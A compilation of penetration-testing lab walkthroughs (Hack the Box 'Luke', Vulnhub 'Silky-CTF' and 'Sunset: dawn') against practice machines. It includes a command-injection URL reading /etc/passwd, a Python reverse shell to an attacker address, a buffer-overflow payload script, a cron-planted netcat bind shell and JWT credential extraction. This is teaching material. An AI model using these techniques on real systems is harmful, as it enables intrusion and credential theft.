Hack the Box Luke Walkthrough


Hello everyone, and welcome to yet another CTF challenge from Hack the Box, called 'Luke', which is available online for those who want to improve their penetration testing and black-box testing skills. Luke is a retired vulnerable lab from Hack the Box, which offers online penetration testing practice suited to your experience level; they have a large collection of vulnerable labs ranging from beginner to expert level.
Level: Easy
Task: Find user.txt and root.txt in the victim’s machine
Penetration Methodologies
Scanning
    Nmap
Enumeration
    Logging in to FTP as anonymous
    Browsing HTTP service
    Directory Scanning using Dirsearch
Exploitation
    Extracting an authentication token using curl
    Extracting User information using curl
    Extracting Password using curl
Privilege Escalation
    Logging in to the Ajenti panel
Capturing the flag
Walkthrough
Network Scanning
Let’s get started then!
Since these labs have a static IP, the IP address for Luke is 10.10.10.137. Let us scan the VM with the most popular port scanning tool, nmap.
nmap -A 10.10.10.137

From the result above we found five open ports on the VM: 21, 22, 80, 3000 and 8000.
The scan also shows that FTP allows anonymous login, so we check it.
ftp 10.10.10.137
ftp> ls
ftp> cd webapp
ftp> ls
ftp> get for_Chihiro.txt

Through the anonymous FTP login we found a file named for_Chihiro.txt; Chihiro and Derry, the names it mentions, might be usernames.
cat for_Chihiro.txt

The nmap results also show an HTTP service on port 80, so we browsed to the target's IP address and found a simple HTML page.

We also started a directory brute force to enumerate the machine further. This gave us some directories and files, namely config.php, management, etc. (dirsearch takes the excluded status codes as one comma-separated list, without spaces).
./dirsearch.py -u http://10.10.10.137 -e php -x 400,403,404

We enumerated all of them; config.php gave us database credentials, as shown in the image below.

We tried these credentials on http://10.10.10.137/management, but it gave back an unauthorized error. We will come back to it later.

Back to our nmap scan, we found a Node.js service running on port 3000. On browsing to the target on port 3000, we got a message saying that an auth token was not supplied.

We then ran a directory brute force on port 3000 as well and found the pages /login and /users.
./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400,403,404

After a bit of research, we found that we can use curl to obtain a JWT from the /login endpoint. For more, you can read the article linked here.
The tricky part is that the username is admin, not root as we first guessed.
So we ran the curl command with admin as the username and the password we found earlier in config.php.
curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login
This gave us the auth token.

We enumerated usernames with curl, passing the token we had just obtained in the Authorization header. This gave us the user information shown in the image below.
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

We then queried each user individually with the same token; the /users/<name> endpoint returns that user's password, as shown in the image below for Derry.
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users/Derry
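The login and authenticated-request steps above, as an added example that is not part of the original walkthrough. The script also decodes the token the page shows (without verifying it) so you can see the algorithm, the claims and how long the token stays valid. It assumes the /login reply carries the token in a field named token (the walkthrough's screenshot of that reply is not reproduced here) and uses only the host, port, endpoints and credentials the walkthrough shows.

```python
import base64
import json
import sys
import urllib.request
from datetime import datetime, timezone

# The token the Luke /login endpoint returned in the walkthrough above.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9."
    "h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310"
)


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> dict:
    """Split a JWT into header, claims and signature WITHOUT verifying it.

    This is for inspection during a test. Only the server holds the HMAC key,
    so an unverified token must never be treated as trustworthy.
    """
    header_b64, claims_b64, sig_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "claims": json.loads(b64url_decode(claims_b64)),
        "signature_len": len(b64url_decode(sig_b64)),
    }


def token_lifetime_seconds(claims: dict) -> int:
    """How long the token is valid for, from its iat/exp claims."""
    return int(claims["exp"]) - int(claims["iat"])


def bearer_header(token: str) -> dict:
    """The header the /users endpoints expect."""
    return {"Authorization": "Bearer " + token}


def login(base_url: str, username: str, password: str) -> dict:
    """POST JSON credentials to /login and return the parsed JSON reply."""
    body = json.dumps({"username": username, "password": password}).encode()
    req = urllib.request.Request(
        base_url + "/login", data=body, method="POST",
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


def get_json(base_url: str, path: str, token: str):
    """GET an authenticated endpoint such as /users or /users/Derry."""
    req = urllib.request.Request(base_url + path, headers=bearer_header(token))
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


if __name__ == "__main__":
    parts = decode_jwt(PAGE_TOKEN)
    claims = parts["claims"]
    print("alg:", parts["header"]["alg"], "| signature bytes:", parts["signature_len"])
    print("claims:", claims)
    print("valid for", token_lifetime_seconds(claims) // 3600, "hours, until",
          datetime.fromtimestamp(claims["exp"], timezone.utc).isoformat())

    # Live run against the box, only when a base URL is given:
    #   python3 luke_api.py http://10.10.10.137:3000 admin Zk6heYCyv6ZE9Xcg
    if len(sys.argv) == 4:
        base, user, pw = sys.argv[1:]
        reply = login(base, user, pw)
        # ASSUMPTION: the token comes back in a field called "token"; adjust
        # if the /login reply on the box names it differently.
        token = reply["token"]
        print(get_json(base, "/users", token))
        print(get_json(base, "/users/Derry", token))
```

Run it with no arguments to inspect the token: it is HS256-signed and carries only a username plus iat/exp 24 hours apart, so a captured token stays usable for a full day, and the same bearer value works for every authenticated endpoint.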

We logged in to the management page successfully using Derry's credentials.
Username: Derry
Password: rZ86wwLvx7jUxtch

After logging in we found files named config.json, config.php and login.php. We enumerated all of them, and config.json seemed the most interesting.


The config.json file contained information about the 'ajenti' service running on port 8000, including a password.


We browsed to the target on port 8000, which gave us another login form. We entered the following credentials, which successfully gave us the Ajenti panel as shown in the image below:
Username: root
Password: KpMasng655EtTy9Z

After enumerating a bit, we saw the option to open a terminal. On opening it, we checked the user and group details with the id command: it is a root shell, because Ajenti itself runs as root, so anyone holding the panel password gets root without any further escalation. From here we read the user and root flags.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.

Silky-CTF: 0x02 Vulnhub Walkthrough



Today we will be solving a boot2root lab from Vulnhub called SILKY-CTF: 0x02. This lab is a good way to keep your penetration testing skills on point while getting some variety.
Download it from HERE
Level: Easy-Intermediate
Task: Boot to Root (flag.txt)
Penetration Methodologies
Scanning
  • Netdiscover
  • Nmap
Enumeration
  • Directory Scanning using DIRB
  • Trying credentials on the admin login
Exploitation
  • Exploiting a command injection vulnerability
  • Confirming command execution by reading /etc/passwd
  • Getting a reverse connection using a Python reverse shell
  • Spawning a TTY shell
Privilege Escalation
  • Finding a SUID file
  • Exploiting a buffer overflow in the SUID binary with a Python-generated payload
  • Cracking hashes using John
Capturing the flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.
netdiscover

We found the target's IP address; the rest of this walkthrough uses 192.168.0.23. Let's begin with a basic port scan with nmap.
nmap -A -sV 192.168.0.23

Enumeration
The nmap result wasn't much use to us, so we ran a directory brute force to enumerate the machine further. This gave us a page, admin.php, which seemed interesting.

After browsing to it, it turned out to be an admin login panel. This might be worth following up.

We clicked on Login and got a login form asking for the admin's username and password. We tried different ways to get into the admin panel but were shut down.

We then tried logging in with random credentials.

The error message was in German. That's different!

Exploitation
After spending some time looking for a way in, we tried injecting a shell command into the username parameter in the URL, as shown in the image. The ls command executed successfully, which means the parameter is vulnerable to OS command injection: the username is passed to a shell, and a newline (%0A) ends whatever command the script runs and starts ours.

To confirm it, we read /etc/passwd through the same injection (the space between cat and its argument is URL-encoded as %20).
192.168.0.23/admin.php?username=%0A/bin/cat%20/etc/passwd

Next, we looked for a flag.txt in silky's home directory.
192.168.0.23/admin.php?username=%0A/bin/cat%20/home/silky/flag.txt

It's time to use a Python reverse shell to get a connection back. Before executing it, start a netcat listener on your machine. Below is the Python reverse shell we sent through the URL; the address and port in s.connect must be those of your own listener (the walkthrough does not show the attacker's address, so it is left as a placeholder), and the whole command has to be URL-encoded before it goes into the username parameter.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Oh yeah! We got the reverse shell on our netcat listener, but it is not a proper shell, so we spawned a TTY with Python.
nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'

While enumerating the machine's directories, we found a SUID binary, cat_shadow. This might come in handy. Let's see.

To see what the binary actually does, we executed it with and without an argument. It tries to read the shadow file, but we got a permission denied.
./cat_shadow
./cat_shadow silky

The binary prints the hex value it expects to find, so we need to get that value into the right place. Since it looked vulnerable to a buffer overflow, we started by passing 100 'A's to see how the reported value changed.
./cat_shadow $(python -c 'print "A"*100')

After some trials we found the offset: 64 bytes of padding ('A') followed by the value 0x496c5962 in little-endian byte order puts the expected value in place. We built that with a Python one-liner, passed the result to cat_shadow and were able to read /etc/shadow. (The bytes of 0x496c5962 are all printable, which matters: argv is a C string and a NUL byte in the payload would cut it short.)
./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')
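The "after some trials" step above, done systematically, as an added example that is not part of the original walkthrough: instead of guessing the padding length, send a cyclic pattern, read off the value the binary reports, and compute the offset from it, then pack the wanted value. It assumes cat_shadow prints the value it compared (as the walkthrough's screenshot shows); the sample value 0x63413163 is constructed here as what a 64-byte offset would produce with this pattern, not output copied from the box.

```python
import struct
import sys

# Metasploit-style cyclic pattern built from upper/lower/digit triplets. Every
# 4-byte window is unique within the first 20280 bytes, so the value that lands
# in the overwritten slot identifies its offset exactly.
_UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_LOWER = "abcdefghijklmnopqrstuvwxyz"
_DIGITS = "0123456789"
_FULL_PATTERN = "".join(u + l + d for u in _UPPER for l in _LOWER for d in _DIGITS)


def pattern_create(length: int) -> str:
    """First `length` bytes of the cyclic pattern."""
    if length > len(_FULL_PATTERN):
        raise ValueError("pattern longer than %d bytes repeats" % len(_FULL_PATTERN))
    return _FULL_PATTERN[:length]


def pattern_offset(value: int) -> int:
    """Offset of the 4-byte window a little-endian 32-bit value came from.

    `value` is the number the target printed (or a register/variable seen in a
    debugger) after the pattern overwrote it. Returns -1 if it is not from the
    pattern, e.g. 0x41414141 from a run with plain 'A's.
    """
    needle = struct.pack("<I", value).decode("ascii", errors="replace")
    return _FULL_PATTERN.find(needle)


def build_payload(offset: int, value: int) -> bytes:
    """`offset` bytes of padding followed by `value` packed little-endian."""
    payload = b"A" * offset + struct.pack("<I", value)
    # argv entries are C strings: a NUL byte would truncate the payload.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte and cannot be passed via argv")
    return payload


if __name__ == "__main__":
    # Usage, on the target once python3 is available there:
    #   ./cat_shadow "$(python3 overflow.py pattern 100)"   -> note the value it reports
    #   python3 overflow.py offset 0x63413163                -> 64
    #   ./cat_shadow "$(python3 overflow.py payload 64 0x496c5962)"
    mode = sys.argv[1] if len(sys.argv) > 1 else "demo"
    if mode == "pattern":
        sys.stdout.write(pattern_create(int(sys.argv[2])))
    elif mode == "offset":
        print(pattern_offset(int(sys.argv[2], 16)))
    elif mode == "payload":
        sys.stdout.buffer.write(build_payload(int(sys.argv[2]), int(sys.argv[3], 16)))
    else:
        # Constructed demo value: the window at offset 64 is "c1Ac", which reads
        # back as 0x63413163 when interpreted as a little-endian 32-bit integer.
        print("offset of 0x63413163 in the pattern:", pattern_offset(0x63413163))
        print("payload:", build_payload(64, 0x496c5962))
```

The payload mode writes raw bytes with no trailing newline so that command substitution passes them through unchanged; the NUL check is what tells you early whether a target value can be delivered through argv at all.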

We copied the hashes into a file on our Kali machine and fired up John to crack them. After some time we got the password for root. Only one thing left to do: read the final flag.

We switched to root with the recovered password and read the final flag.



HA: Infinity Stones CTF Challenges


Thanos thinks that if he kills half of all life in the universe, he’ll restore balance. To do so, he needs all six Infinity Stones to power his Infinity Gauntlet, which in turn will give him the ability to bend time, space, energy, and the laws of physics and reality. But the Avengers are one step ahead of Thanos this time. Avengers have hidden all the Infinity Stones all over this CTF. Help Thanos to get all the Infinity Stones and restore the balance of the universe.

This machine contains 6 Infinity Stones with Six different flags to test your skills.

1. Space Stone
2. Mind Stone
3. Reality Stone
4. Time Stone
5. Power Stone
6. Soul Stone

Each stone is found in a different way.

ENUMERATION IS THE KEY !!!!!

https://drive.google.com/file/d/1kLXbHgdx92YRJLdRnf_EVZWEulA0MYYo/view?usp=sharing

Wordy: CTF Challenge


Wordy is designed for beginners to experience real-life penetration testing. This lab is completely dedicated to web application testing, and it contains several vulnerabilities that can be exploited in multiple ways. It is therefore not intended only as a boot-to-root challenge; the primary agenda is hands-on exploitation of top-listed web application vulnerabilities.
As this is a WordPress-based lab, it is designed so that users can practise the following vulnerabilities:
·        LFI
·        RFI
·        CSRF
·        File Upload
·        SQL injection

Download: here

Sunset: dawn Vulnhub Walkthrough


Today we are going to solve another CTF challenge called “Sunset: dawn”. It is available on Vulnhub for the purpose of Penetration Testing practices. This is a box from the Sunset series. The credit for making this lab goes to “whitecr0wz”. Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the Vulnhub website, we will be downloading the lab file from this link.

Penetration Testing Methodology
Network Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Browsing HTTP Service
·        Performing Directory Bruteforce
·        Enumerating log files
·        Enumerating SMB using Enum4linux
Exploiting
·        Connecting via SMB
·        Uploading files containing a netcat shell invocation
Privilege Escalation
·        SUID bit on zsh

Capture the flag

Walkthrough

Network Scanning
We will be running this lab in VMware Workstation Player or VirtualBox. After starting the lab, we used netdiscover to find its IP address.

netdiscover
This turned out to be 192.168.1.165.



Now we run an aggressive nmap scan to gather information about the open ports and the services running on the target machine.
nmap -A 192.168.1.165
We learned from the scan that port 80 is open, hosting Apache httpd, and that ports 139, 445 and 3306 are open, which tells us that NetBIOS/SMB and MySQL are running on the target.



Enumeration
Since port 80 is open, we browsed to the IP address. We got an 'unavailable' error as shown in the image.



We also started a directory brute force to enumerate the machine further. This gave us a directory called "logs", as shown in the image.
dirb http://192.168.1.165/



Upon finding the logs directory, we opened it in the browser. It listed a number of log files, such as auth.log, daemon.log, error.log and management.log. We tried to access all of them but got a forbidden message for every one except management.log.



So we downloaded management.log and opened it with cat on our attacker machine (Kali Linux). Here we see a directory named ITDEPT containing two files, product-control and web-control. As these files appear in the log alongside cron, we can safely say they are being executed by a scheduled background task.
cd Downloads
cat management.log



Back to the nmap scan: SMB (NetBIOS) is open, so it's time to enumerate the SMB service. There are multiple ways to do this, which you can learn about here. We used the enum4linux script. It lists a share named ITDEPT, matching the directory we found earlier, which means that directory is accessible over SMB.
enum4linux -a 192.168.1.165



Also, as we went through the enum4linux output, we saw two users: dawn and ganimedes.



Exploitation
Since we found the ITDEPT share during enumeration, we connected to it over SMB as shown in the image, giving a blank password. After connecting we ran ls and found nothing; we ran ls again with -al to check for hidden files, but there were none.
smbclient //192.168.1.165/ITDEPT
ls
ls -al



But that doesn't mean we cannot create files in it. Back in our terminal, we created files named product-control and web-control, because management.log showed files with exactly these names being executed by cron over and over. Using echo, we put a netcat bind-shell invocation in each: it listens on port 1234 on the target and hands /bin/bash to whoever connects. Note that this relies on the target's netcat supporting -e (netcat-traditional); the OpenBSD variant does not have that option.
echo "nc -e /bin/bash -lvp 1234 &" > product-control
echo "nc -e /bin/bash -lvp 1234 &" > web-control
ls



Back in the SMB session, we transferred the files we had just created to the target with the put command. Both uploaded successfully, and an ls afterwards confirmed they were on the share, as seen in the image below.
put product-control
put web-control
ls



We then went back to the browser and downloaded management.log again to check whether the files we had just uploaded had been executed. As shown in the image, cron ran them on the target.



Now we connected with netcat to the port our files opened on the target and got a shell. It was an improper shell, so we used the Python one-liner to upgrade it to a proper one. After the upgrade we saw that the shell was running as user dawn.
nc 192.168.1.165 1234
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Now that we had a shell, standard practice is to look for files with the SUID bit set using find. The following command lists every SUID binary on the system:
find / -perm -u=s -type f 2>/dev/null
whoami
/usr/bin/zsh
whoami
cd /root
ls
cat flag.txt
The find output showed that /usr/bin/zsh has the SUID bit set, which can help us escalate privileges. Unlike bash, which drops an inherited effective UID unless started with -p, zsh keeps it, so simply running the SUID zsh gives a shell with root's effective UID. We ran it and checked with whoami: root. Now it was time to look for the flag. We moved into the root directory and found flag.txt. This concludes the CTF.